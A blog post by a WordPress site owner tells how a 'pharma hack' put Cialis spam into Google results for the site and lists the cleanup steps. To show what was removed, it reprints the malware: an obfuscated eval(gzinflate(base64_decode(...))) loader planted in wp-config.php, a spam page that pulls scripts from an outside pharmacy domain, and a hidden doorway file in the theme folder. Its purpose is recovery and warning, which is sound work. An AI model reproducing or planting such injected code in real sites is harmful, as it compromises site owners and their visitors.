Cialis Found on Wordpress Google Search and The Solution to Remove the Virus

On May 23^rd 2011, suddenly when I search through Google.com using keywords: Perbandingan Agama, the Description of Cialis, Drugstore found on my website. It was Pharma-Hacked.  The result is like this:

Perbandingan Agama - Media Islam - 3 kunjungan - 25 Mei - [ Terjemahkan laman ini ]

Generic Cialis Women Effects - Official Drugstore. 24h online support. Absolute privacy. Order 25 mg Cialis.Brand and Generic Pills. Generic Cialis Women ...

media-islam.or.id/category/perbandingan-agama/ - Tembolok –



There is a link refers to:

http://ed-pills-online.com

I hope if this domain using Google Hack to other websites, all search engines should block this website and hope the authority in US could catch this owner. And we as internet users, don’t by products from the hacker site.

After searching through the internet, finally I can get rid of the hack. The problem solved. At least some keywords don’t show the pharma hack’s description such as keyword: sombong, riya, etc.

There is a possibility the virus enter from freeshoutbox.net on my widget. The link to freeshoutbox.net is dead at that time. If you want to check whether your website got hacked, just search the google using keywords: yourdomain cialis

Well, I have done as follow to get rid of the virus:

1. I remove file whois.dat which contains:

whois.dat

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>We Always Have The Cheapest Offers In Our Pharmacy Store</title>

<LINK rel="stylesheet" href="http://ed-pills-online.com/themes/blue/css/style.css" type="text/css">

<script type="text/javascript" src="http://ed-pills-online.com/themes/card.js"></script>

<!-- SESSION INFO -->

<script type="text/javascript">

var SessionType   = "URL";

var SessionPrefix = "39c9a48876fdaf665f3a57970e16a114";

var SessionName   = "USID";

</script>

<!-- /SESSION INFO -->

</head>

<body>

<!-- Top menu and cart -->

<!--  Pre-loaded images  -->

<div style="position:absolute;width:1px;height:1px;overflow:hidden;top:-20px;left:-20px;">

<img src="http://ed-pills-online.com/themes/blue/img/home_over.gif">

<img src="http://ed-pills-online.com/themes/blue/img/bestsellers_over.gif">

<img src="http://ed-pills-online.com/themes/blue/img/all_products_over.gif">

<img src="http://ed-pills-online.com/themes/blue/img/faq_over.gif">

2. I delete some lines in wp-config.php start from: eval (gzinflate(base64_decode(

Wp-config.php

<?php

/** WordPress's config file **/

/** http://wordpress.org/   **/

// ** MySQL settings ** //

define('WP_CACHE', true); //Added by WP-Cache Manager

define('DB_NAME', 'xxxdb');     // The name of the database

define('DB_USER', xxxi');     // Your MySQL username

define('DB_PASSWORD', 'xxx'); // ...and password

define('DB_HOST', 'mysql.dreamxxx.usefulz.com');     // ...and the server MySQL is running on

// Change the prefix if you want to have multiple blogs in a single database.

$table_prefix  = 'wp_yzpa03_';   // example: 'wp_' or 'b2' or 'mylogin_'

// Change this to localize WordPress.  A corresponding MO file for the

// chosen language must be installed to wp-includes/languages.

// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'

// to enable German language support.

define ('WPLANG', '');

/* Stop editing */

$server = DB_HOST;

$loginsql = DB_USER;

$passsql = DB_PASSWORD;

$base = DB_NAME;

eval (gzinflate(base64_decode(

'Hc7BisIwEADQu+A/eKuCdkRbqSgWF1YU9iDoPUybqR1pMjFJEfx6y97f4ZWHfela'

.'Nx55evXsSYmtaZpAK4YAH32w/EHDYEgzLjh0aFLxKWt4u0UtNpKNEFsyFAAjtj12'

.'DtfZCsRFFhvgGWrpxEPtJQRodLbJ14hVsaFC5xUWVd6scp0tCbfpEElmu/FIU8N2'

.'WBx/btfj/ZzMJ5q9RUNTpU6Xv1+lZmkC/7Qc/l8=')));

// Get everything else

require_once(ABSPATH.'wp-settings.php');

?>

Well, you should find all files contain eval (gzinflate(base64 in your wordpress directory since the virus could attack different program

3. I delete the folder in my theme as follow since all the files in the folder refer to the cialis website. Try to find all the files using keyword “Drugstore”:

File: /media-islam.or.id/wp-content/themes/atahualpa342/options/jscolor/cross/ffa193430d11bdecb2275621b7dbd213

S

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">

<title>Generic 15 mg Cialis - Cheap High-Quality Pills.</title>

<meta name="keywords" content=" Generic 15 mg Cialis Generic Cialis on-line medication">

<meta name="description" content="Generic 15 mg Cialis - Official Drugstore. 24h online support. Absolute privacy. Order 25 mg Cialis.Brand and Generic Pills. Order Cialis com">

</head>

<body>

<table width="100%"  border="0" cellspacing="0" cellpadding="0" height="691">

<tr valign="top">

<td width="260" height="132" bordercolorlight="#808080" bordercolordark="#C0C0C0" bgcolor="#C0C0C0">

<p align="center"><a href="http://www.media-islam.or.id/category/usaha-muslim/" title="order 20 mg cialis">order 20 mg cialis</a><br>

<a href="http://www.media-islam.or.id/page/2/" title="order cialis in holland">order cialis in holland</a><br>

4. I don’t know if there is a connection with a virus, but I delete folder net2ftp_temp in Wordpress/wp-content/plugin

5. I reinstall my wordpress with the newest version, and recheck the file above again

6. I reinstall my theme with the newest version.

Then thank God, when I search another keyword such as sombong or riya in Google, the Cialis ads don’t appear. If it’s still appear in Perbandingan Agama, that’s probably because og Google Caching at that time.

Thanks to these websites who gave me inspirations and help me a lot!

http://www.seobook.com/wordpress-blog-hacking-checklist

http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html